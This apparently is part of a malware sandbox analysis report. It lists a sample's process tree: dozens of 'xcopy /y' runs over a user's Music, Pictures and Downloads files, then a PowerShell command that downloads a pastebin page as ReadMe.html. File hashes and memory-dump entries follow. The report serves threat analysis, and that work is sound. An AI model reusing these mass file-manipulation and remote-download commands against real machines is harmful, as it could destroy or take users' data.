C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\RemoveRename.ADTS2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\RenameTrace.7z2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\RepairExpand.au32⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\ResolveTrace.txt2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\ResumeUpdate.ttf2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\SaveFormat.vbs2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\SearchEnter.edrwx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\SearchStep.cr22⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\SelectSave.M2V2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\SetDeny.exe2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\SuspendBlock.dwg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\SwitchNew.dwfx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\ConfirmSwitch.jpg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\ConvertFromExport.dwg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\DebugSend.pcx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\DisableStep.dwg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\DismountMove.bmp2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\DismountSearch.dxf2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\EditGroup.jpg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\ExportHide.jpeg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\FindUndo.tif2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\FormatGet.tif2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\InvokeFind.emf2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\LockDisable.svg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\MeasureCheckpoint.emz2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\My Wallpaper.jpg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\NewCopy.jpg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\PingCompress.ico2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\ProtectMeasure.png2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\PublishWait.raw2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\RedoRevoke.wmf2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\RenameExit.tif2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\ResolveShow.dib2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\RestoreLimit.crw2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\RestoreUndo.crw2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\ResumeInitialize.cr22⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\SubmitDebug.dib2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\SwitchExport.dxf2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\TraceNew.pcx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\UnlockSave.emz2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\UnregisterNew.emz2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\UnregisterShow.jpg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\WaitOpen.jpg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Pictures\WriteSkip.raw2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\ApproveClear.fon2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\BlockPop.mid2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\CheckpointJoin.mpeg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\ClearUnblock.txt2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\DebugSkip.xls2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\DenyRedo.snd2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\DisableGet.wmx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\DisconnectConvert.vdx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\DisconnectRequest.html2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\ExpandConfirm.sql2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\GrantClose.gif2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\GroupConfirm.jfif2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\HideCompress.wdp2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\HideUnlock.iso2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\ImportHide.ppt2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\InstallSkip.mp22⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\LockSplit.TTS2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\MeasureDisable.php2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\MeasureWait.TTS2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\NewTest.wm2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\PublishRegister.cab2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\ReadStop.xsl2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\RemoveCheckpoint.shtml2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\ResetPush.aiff2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\RestoreRequest.wax2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\RevokeDisconnect.M2V2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\SaveUse.MOD2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\SelectInstall.3g22⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\SuspendOpen.mpp2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\TraceGroup.jpeg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\UninstallEdit.wpl2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Downloads\UnlockSplit.AAC2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://pastebin.com/raw/CSGTwG5A -outfile ReadMe.html"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5db8349341427b8c6723a6307bcfde310
SHA13af17699c8a60c2d110cb5768af1591c7ed742cf
SHA2560d120c081d1099e20b7095a7aef3da3d697790a96c28e363e6eb1148e4fec64d
SHA512931fadf2bf665509c48af49db9ca95e671db5f1ca03152cec97621e88964cc5ce00db9eed5b5ab4074131ef84df062ca52b4ab606a275ae11d36a41a4b7e5de4
-
C:\Users\Admin\Documents\black.batFilesize
71B
MD53544e4b7ac1418d34061648a9f3e3dc6
SHA130e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce
SHA256db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8
SHA5125d3048b421b4900efdce377d61f8965beb4bc02db27875c03eb378cd9996de9a01b63e54e99b4f94e4cf14e1b60d873d715ccea38fd0bdc1200ad3a2f268e126
-
memory/336-111-0x0000000000000000-mapping.dmp
-
memory/468-109-0x0000000000000000-mapping.dmp
-
memory/668-83-0x0000000000000000-mapping.dmp
-
memory/700-75-0x0000000000000000-mapping.dmp
-
memory/812-117-0x0000000000000000-mapping.dmp
-
memory/936-121-0x0000000000000000-mapping.dmp
-
memory/940-93-0x0000000000000000-mapping.dmp
-
memory/952-79-0x0000000000000000-mapping.dmp
-
memory/1012-76-0x0000000000000000-mapping.dmp
-
memory/1068-113-0x0000000000000000-mapping.dmp
-
memory/1072-81-0x0000000000000000-mapping.dmp
-
memory/1076-119-0x0000000000000000-mapping.dmp
-
memory/1120-87-0x0000000000000000-mapping.dmp
-
memory/1156-99-0x0000000000000000-mapping.dmp
-
memory/1176-97-0x0000000000000000-mapping.dmp
-
memory/1180-92-0x0000000000000000-mapping.dmp
-
memory/1224-78-0x0000000000000000-mapping.dmp
-
memory/1276-136-0x000000000283B000-0x000000000285A000-memory.dmpFilesize
124KB
-
memory/1276-133-0x000007FEF2F60000-0x000007FEF3ABD000-memory.dmpFilesize
11.4MB
-
memory/1276-101-0x0000000000000000-mapping.dmp
-
memory/1276-135-0x000000001B6F0000-0x000000001B9EF000-memory.dmpFilesize
3.0MB
-
memory/1276-134-0x0000000002834000-0x0000000002837000-memory.dmpFilesize
12KB
-
memory/1276-132-0x000007FEF3AC0000-0x000007FEF44E3000-memory.dmpFilesize
10.1MB
-
memory/1340-112-0x0000000000000000-mapping.dmp
-
memory/1340-67-0x0000000000000000-mapping.dmp
-
memory/1348-103-0x0000000000000000-mapping.dmp
-
memory/1396-105-0x0000000000000000-mapping.dmp
-
memory/1400-86-0x0000000000000000-mapping.dmp
-
memory/1448-104-0x0000000000000000-mapping.dmp
-
memory/1448-120-0x0000000000000000-mapping.dmp
-
memory/1468-55-0x0000000000000000-mapping.dmp
-
memory/1468-56-0x000007FEFC4B1000-0x000007FEFC4B3000-memory.dmpFilesize
8KB
-
memory/1468-57-0x000007FEF4460000-0x000007FEF4E83000-memory.dmpFilesize
10.1MB
-
memory/1468-59-0x0000000001EC0000-0x0000000001F40000-memory.dmpFilesize
512KB
-
memory/1468-58-0x000007FEF3900000-0x000007FEF445D000-memory.dmpFilesize
11.4MB
-
memory/1468-123-0x0000000000000000-mapping.dmp
-
memory/1504-122-0x0000000000000000-mapping.dmp
-
memory/1504-106-0x0000000000000000-mapping.dmp
-
memory/1532-66-0x0000000000000000-mapping.dmp
-
memory/1548-65-0x0000000000000000-mapping.dmp
-
memory/1556-107-0x0000000000000000-mapping.dmp
-
memory/1560-73-0x0000000000000000-mapping.dmp
-
memory/1564-60-0x0000000000000000-mapping.dmp
-
memory/1604-110-0x0000000000000000-mapping.dmp
-
memory/1608-62-0x0000000000000000-mapping.dmp
-
memory/1608-94-0x0000000000000000-mapping.dmp
-
memory/1620-124-0x0000000000000000-mapping.dmp
-
memory/1620-108-0x0000000000000000-mapping.dmp
-
memory/1628-64-0x0000000000000000-mapping.dmp
-
memory/1628-95-0x0000000000000000-mapping.dmp
-
memory/1664-98-0x0000000000000000-mapping.dmp
-
memory/1664-69-0x0000000000000000-mapping.dmp
-
memory/1668-85-0x0000000000000000-mapping.dmp
-
memory/1672-114-0x0000000000000000-mapping.dmp
-
memory/1676-125-0x0000000000000000-mapping.dmp
-
memory/1700-71-0x0000000000000000-mapping.dmp
-
memory/1736-82-0x0000000000000000-mapping.dmp
-
memory/1760-61-0x0000000000000000-mapping.dmp
-
memory/1772-68-0x0000000000000000-mapping.dmp
-
memory/1772-96-0x0000000000000000-mapping.dmp
-
memory/1784-90-0x0000000000000000-mapping.dmp
-
memory/1788-84-0x0000000000000000-mapping.dmp
-
memory/1808-91-0x0000000000000000-mapping.dmp
-
memory/1820-63-0x0000000000000000-mapping.dmp
-
memory/1840-77-0x0000000000000000-mapping.dmp
-
memory/1868-74-0x0000000000000000-mapping.dmp
-
memory/1896-118-0x0000000000000000-mapping.dmp
-
memory/1896-102-0x0000000000000000-mapping.dmp
-
memory/1900-115-0x0000000000000000-mapping.dmp
-
memory/1904-116-0x0000000000000000-mapping.dmp
-
memory/1904-100-0x0000000000000000-mapping.dmp
-
memory/1988-54-0x0000000000000000-mapping.dmp
-
memory/1996-89-0x0000000000000000-mapping.dmp